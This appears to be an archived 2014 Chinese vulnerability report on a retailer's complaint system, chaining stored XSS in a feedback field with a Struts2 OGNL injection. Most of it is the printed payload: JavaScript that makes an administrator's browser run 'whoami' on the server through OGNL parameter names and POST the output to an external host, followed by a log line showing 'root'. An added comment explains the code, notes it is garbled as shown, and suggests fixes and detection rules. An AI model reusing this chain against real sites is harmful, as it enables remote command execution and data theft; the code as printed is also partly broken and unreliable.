2014-09-13: 细节已通知厂商并且等待厂商处理中 2014-09-18: 厂商已经主动忽略漏洞,细节向公众公开
XSS+STRUCT2漏洞检测内网
在吐槽处插入XSS代码
/*
 * Stored-XSS payload that was placed in the feedback ("吐槽") field; it
 * presumably executes in the browser of whoever later views that feedback
 * (the log line below this script shows an admin-style .action URL as the
 * referring page). As printed here the script is collapsed onto one line
 * and lacks a statement separator in three places (`}mlhttp.open(`,
 * `}}lhttp.open(`, `)lhttp.send()`), so it is not valid JavaScript as shown —
 * most likely line breaks were lost when the report was archived. The
 * `[email protected]` fragments inside the URL are also an archiving artefact
 * (an e-mail obfuscation filter rewrote the `@` sequences), so the query
 * string is not intact either.
 *
 * up_data(data): URL-encodes `data` (the `var data=` line redeclares the
 *   parameter) and POSTs it as the form field `data=` to the unrelated
 *   external host http://www.memeda.pw/g.php with an asynchronous XHR.
 *   `up_result` receives the reply but is never returned or used. This is
 *   the exfiltration step; a page on the victim origin issuing a POST to an
 *   unrelated host is what a `connect-src` CSP or outbound-request
 *   monitoring should block or flag.
 *
 * get_web_by_get(url): synchronous XHR GET (`open(..., false)`); the
 *   readyState==4 handler stores `responseText` in `get_result`, which can be
 *   returned only because the synchronous send() blocks until completion.
 *
 * Top level: fetches `/toViewFeedBack.action` with a query string whose
 *   parameter *names* are OGNL expressions (the `\43` / `\75` / `\40` octal
 *   escapes stand for `#`, `=`, space). As written they lift the
 *   `_memberAccess` restrictions and end in `Runtime.exec(...)` of the `cmd`
 *   parameter (`cmd=whoami`), writing its output into the HTTP response, so
 *   `sdata` holds command output from the application server and `up_data`
 *   then ships it to the external host. The `(i2)` parameter appears twice.
 *   The underlying flaw is the Struts2 parameter-name OGNL injection named in
 *   the report title; the fix is server-side (a Struts2 release that rejects
 *   such parameter names), and detection rules should match
 *   `_memberAccess`, `allowStaticMethodAccess` or `\43`/`#` inside parameter
 *   names in access logs or at the WAF.
 */
function up_data(data){var up_result;var data=encodeURIComponent(data);var mlhttp=new XMLHttpRequest();mlhttp.onreadystatechange=function(){if(mlhttp.readyState==4){up_result=mlhttp.responseText;}}mlhttp.open("POST","http://www.memeda.pw/g.php",true);mlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");mlhttp.send("data="+data);}function get_web_by_get(url){var lhttp=new XMLHttpRequest();var get_result;lhttp.onreadystatechange=function(){if(lhttp.readyState==4){get_result=lhttp.responseText;}}lhttp.open("GET",url,false)lhttp.send();return get_result;}var sdata=get_web_by_get("/toViewFeedBack.action?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\[email protected]@EMPTY_SET')(c))&(g)(('\\43req\\[email protected]@getRequest()')(d))&(h)(('\\43webRootzpro\\[email protected]@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[51020]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=whoami");up_data(sdata);
2014-09-13 14:59:43-IP:113.98.252.129-Url: http://csc.xiu.com/updateComplaintBillsStatus.action?statusNum=1&feedback.show=0&Id=27473&feedback.id=27473root
T_T都懂,耐心足的应该可以把网站翻了吧~~
危害等级:无影响厂商忽略
忽略时间:2014-09-18 19:32
暂无